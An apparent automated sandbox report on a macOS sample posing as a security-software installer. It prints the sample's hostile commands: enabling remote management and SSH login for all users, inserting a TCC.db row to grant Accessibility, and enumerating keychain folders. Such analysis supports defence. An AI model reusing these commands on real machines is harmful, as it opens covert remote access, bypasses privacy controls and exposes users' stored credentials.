Source: /bin/sh (PID: 563)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 564)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 565)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 566)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 567)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 568)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 569)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 570)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 571)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 572)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 573)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 574)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 575)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 576)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 577)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 578)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 579)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 580)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 581)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 582)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 583)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 584)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 585)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 586)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 587)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 588)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 589)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 590)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 591)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 592)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 593)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 594)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 595)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 596)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 597)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 598)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 599)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 600)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 601)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 602)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 603)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 604)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 605)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 606)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 607)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 608)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 609)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 610)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 611)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 612)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 613)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 614)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 615)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 616)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 617)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 618)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 619)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 620)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 621)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 622)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 623)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 624)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 625)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 626)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 627)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 628)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 629)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 630)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 631)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 632)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 633)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 634)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 635)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 636)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 637)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 638)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 639)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 640)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 641)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 642)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 643)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 644)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 645)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 646)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 648)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 665)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /bin/sh (PID: 667)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 671)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 673)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 675)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 677)Sysctl requested: kern.hostname (1.10)Jump to behavior
Source: /usr/bin/sudo (PID: 679)Sysctl requested: kern.hostname (1.10)Jump to behavior
Reads the system or server version plist fileShow sources
Source: /Volumes/Mac Internet Security X9/Mac Internet Security X9 Installer.app/Contents/MacOS/Mac Internet Security X9 Installer (PID: 529)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior
Source: /usr/bin/sw_vers (PID: 547)System or server version plist file read: /System/Library/CoreServices/SystemVersion.plistJump to behavior

Lowering of HIPS / PFW / Operating System Security Settings:

barindex
Executes the "defaults" command used to read or modify user specific settingsShow sources
Source: /usr/bin/perl5.18 (PID: 668)Defaults executable: /usr/bin/defaults -> /usr/bin/defaults write /Library/Preferences/com.apple.RemoteManagement ARD_AllLocalUsers -boolean YESJump to behavior
Source: /usr/bin/perl5.18 (PID: 669)Defaults executable: /usr/bin/defaults -> /usr/bin/defaults write /Library/Preferences/com.apple.RemoteManagement ARD_AllLocalUsersPrivs -integer 1073742079Jump to behavior
Executes the "systemsetup" command used to configure System PreferencesShow sources
Source: /usr/bin/sudo (PID: 543)Systemsetup executable: /usr/sbin/systemsetup -> systemsetup -setremotelogin onJump to behavior
Source: /usr/bin/sudo (PID: 672)Systemsetup executable: /usr/sbin/systemsetup -> systemsetup -setcomputersleep NeverJump to behavior
Queries and/or modifies the SQLite TCC DB responsible for privacy and accessibility relevant settingsShow sources
Source: /usr/bin/sudo (PID: 541)TCC.db query/modification: /usr/bin/sqlite3 -> /usr/bin/sqlite3 /Library/Application Support/com.apple.TCC/TCC.db INSERT or REPLACE INTO access VALUES('kTCCServiceAccessibility','com.intego.Mac-Internet-Security-X9-Installer',0,1,1,NULL,NULL)Jump to behavior

Stealing of Sensitive Information:

barindex
Executes the "ifconfig" command used to gather network informationShow sources
Source: /bin/bash (PID: 538)Ifconfig executable: /sbin/ifconfig -> ifconfigJump to behavior
May steal keychain information which contains credentialsShow sources
Source: /usr/bin/zip (PID: 537)Keychain directory enumerated: /Users/henry/Library/KeychainsJump to behavior
Source: /usr/bin/zip (PID: 537)Keychain directory enumerated: /Library/KeychainsJump to behavior
Writes files with ifconfig informationShow sources
Source: /sbin/ifconfig (PID: 538)File created with possible ifconfig output: /Users/henry/.calisto/network.datJump to dropped file


Runtime Messages

Command:open
Exit Code:0
Exit Code Info:
Killed:False
Standard Output:
Standard Error:

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Number of created Files
  • Shell
  • Is malicious
behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 57793 Sample: FmTmHujm4o Startdate: 26/07/2018 Architecture: MAC Score: 100 68 mesu.g.aaplimg.com 17.253.57.208, 443, 49263 APPLE-AUSTIN-AppleIncUS United States 2->68 10 xpcproxy Mac Internet Security X9 Installer 2->10         started        process3 process4 12 bash 1 10->12         started        14 bash mkdir 10->14         started        process5 16 bash sudo 12->16         started        19 bash sudo 12->19         started        21 bash sudo 12->21         started        23 10 other processes 12->23 file6 70 Executes the "sudo" command used to execute a command as another user 16->70 26 sudo kickstart perl5.18